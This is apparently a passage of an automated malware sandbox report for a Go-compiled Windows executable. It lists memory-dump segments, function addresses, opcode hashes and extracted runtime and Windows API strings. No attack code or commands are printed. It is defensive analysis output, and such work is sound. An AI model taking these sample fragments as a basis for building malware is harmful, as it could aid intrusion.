            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.$, not a functiongc: unswept span KiB work (bg), mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$, not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failed$nil elem type! to finalizer GC worker initruntime: full=runtime: want=MB; allocated timeEndPeriod$runtime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already $runtime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memory: cannot allocate runtime.preemptM: duplicatehandle failedglobal runq empty wi$runtime.SetFinalizer: first argument is nilruntime.SetFinalizer: finalizer already setgcBgMarkWorker: unexpected gcMarkWorkerModenon in-use span found with specials bit setgrew heap, but no adequate free space foundroot level max pages doesn't fit in summaryru$runtime.SetFinalizer: first argument was allocated into an arenacompileCallback: expected function with one uintptr-sized resultAWS_SECRET_ACCESS_KEY or AWS_SECRET_KEY not found in environmentclient configured for accelerate but not supported for operationflat$runtime.SetFinalizer: pointer not at beginning of allocated blockinvalid value for environment variable, %s=%s, need true or falsetls: internal error: attempted to read record with QUIC transporttls: server selected an invalid version after a HelloRetryRequest$runtime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan state$runtime.SetFinalizer: second argument is gcSweep being done but phase is not GCoffobjects added out of order or overlappingmheap.freeSpanLocked - invalid stack freemheap.freeSpanLocked - invalid span stateattempted to add zero-sized address rangeruntime: block
            • API String ID: 0-1190865079
            • Opcode ID: 582a67c05b9f8afcabc89f0edc7881d76846588394aedeb485fa12154e6bbb65
            • Instruction ID: 2da1b757b8a0842a553541bd9e6f2d40e8d336a117d54c53455aefb79803779f
            • Opcode Fuzzy Hash: 582a67c05b9f8afcabc89f0edc7881d76846588394aedeb485fa12154e6bbb65
            • Instruction Fuzzy Hash: 67F1CEB2619BC0C5DB609B91E4803EEB7A6F785B80F48862ADA8D07B95DF3CC4D5C711
            Function 006F2D60 Relevance: 12.9, Strings: 10, Instructions: 364COMMON
            Download Yara Rule
            Strings
            • untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCrea, xrefs: 006F332C
            • missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlus, xrefs: 006F31F9, 006F3379
            • bad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetC, xrefs: 006F314A, 006F32CA
            • and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125sse41sse42ssse3int16int32int64uint8slicetls: , xrefs: 006F30CF, 006F325A
            • locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Repeat countsocket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketEastern Standard Tim, xrefs: 006F3275
            • runtime: frame runtimer: bad ptraceback stuckadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Faile, xrefs: 006F3194, 006F3309
            • runtime: pcdata is bad ABI descriptiondodeltimer: wrong Padjusttimers: bad pillegal instructionbad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyCryptReleaseContextGetTokenInformationCreateSymbolicLinkWGetCurrentPro, xrefs: 006F30B3, 006F323F
            • untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMe, xrefs: 006F31B7
            • (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32, xrefs: 006F3117, 006F3298
            • args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada C, xrefs: 006F30EF
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: (targetpc= , plugin: runtime: g : frame.sp=created by broken pipealarm clockbad messagefile existsbad addressRegCloseKeyCreateFileWDeleteFileWExitProcessFreeLibrarySetFileTimeVirtualLockWSARecvFromclosesocketgetpeernamegetsocknamecrypt32.dllmswsock.dllsecur32$ and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125sse41sse42ssse3int16int32int64uint8slicetls: $ args stack map entries for invalid runtime symbol tableruntime: no module data for traceRegion: alloc too large[originating from goroutine file descriptor in bad statedestination address requiredprotocol driver not attachedCertCreateCertificateContextCanada C$ locals stack map entries for abi mismatch detected between runtime: impossible type kind unsafe.Slice: len out of rangestrings: negative Repeat countsocket operation on non-socketinappropriate ioctl for deviceprotocol wrong type for socketEastern Standard Tim$ untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMe$ untyped locals missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCrea$bad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetC$missing stackmapbad symbol tablenon-Go function not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlus$runtime: frame runtimer: bad ptraceback stuckadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Faile$runtime: pcdata is bad ABI descriptiondodeltimer: wrong Padjusttimers: bad pillegal instructionbad file descriptordisk quota exceededtoo many open filesdevice not a streamdirectory not emptyCryptReleaseContextGetTokenInformationCreateSymbolicLinkWGetCurrentPro
            • API String ID: 0-808712497
            • Opcode ID: eed42605586c965abb191012cb5ac2da20521dd5d1f092621d936fceb7867acf
            • Instruction ID: c1df8f4d3c7b1050260c4d0739387a4b384d668c214771b2e5b6bad77bd5b7a6
            • Opcode Fuzzy Hash: eed42605586c965abb191012cb5ac2da20521dd5d1f092621d936fceb7867acf
            • Instruction Fuzzy Hash: 30E1F532614B88C6DB60EF25E4803AEB366F788780F95512AEF8D43769DF78C944CB10
            Function 006FF520 Relevance: 6.7, Strings: 5, Instructions: 451COMMON
            Download Yara Rule
            Strings
            • sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aoss, xrefs: 006FFB92
            • ...0,h1\\?NUL:\/*?[\\.\??finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+1, xrefs: 006FF9B7
            • pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind, xrefs: 006FFBB2
            • fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aossfipsgluelogs, xrefs: 006FFB72
            • non-Go function at pc=argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedConvertSidToStringSidWConvertStringSidToSidWCreateIoCompletionPortGetEnvironmentStri, xrefs: 006FFCDB
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aossfipsgluelogs$ pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind$ sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aoss$...0,h1\\?NUL:\/*?[\\.\??finptrobjgc %: gp *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+1$non-Go function at pc=argument list too longaddress already in usenetwork is unreachablecannot allocate memoryprotocol not availableprotocol not supportedremote address changedConvertSidToStringSidWConvertStringSidToSidWCreateIoCompletionPortGetEnvironmentStri
            • API String ID: 0-2102030124
            • Opcode ID: b13c683f8260467c9f796be77c31c038b9e14acba7047abb29c201b4b4630eb5
            • Instruction ID: 882ff83e64be54a72a83e4f3c00143e5b93f10f4db7da75ccc7307b00c004ce3
            • Opcode Fuzzy Hash: b13c683f8260467c9f796be77c31c038b9e14acba7047abb29c201b4b4630eb5
            • Instruction Fuzzy Hash: 06223736609BC8C5DB709B21E4943AEB766FB89B80F44512AEF8D47B69CF39C545CB00
            Function 006BB500 Relevance: 6.6, Strings: 5, Instructions: 334COMMON
            Download Yara Rule
            Strings
            • p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup, xrefs: 006BBA98
            • runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64, xrefs: 006BBA3B
            • ?n, xrefs: 006BB9FC
            • flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan, xrefs: 006BBA56
            • != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 006BBA71
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
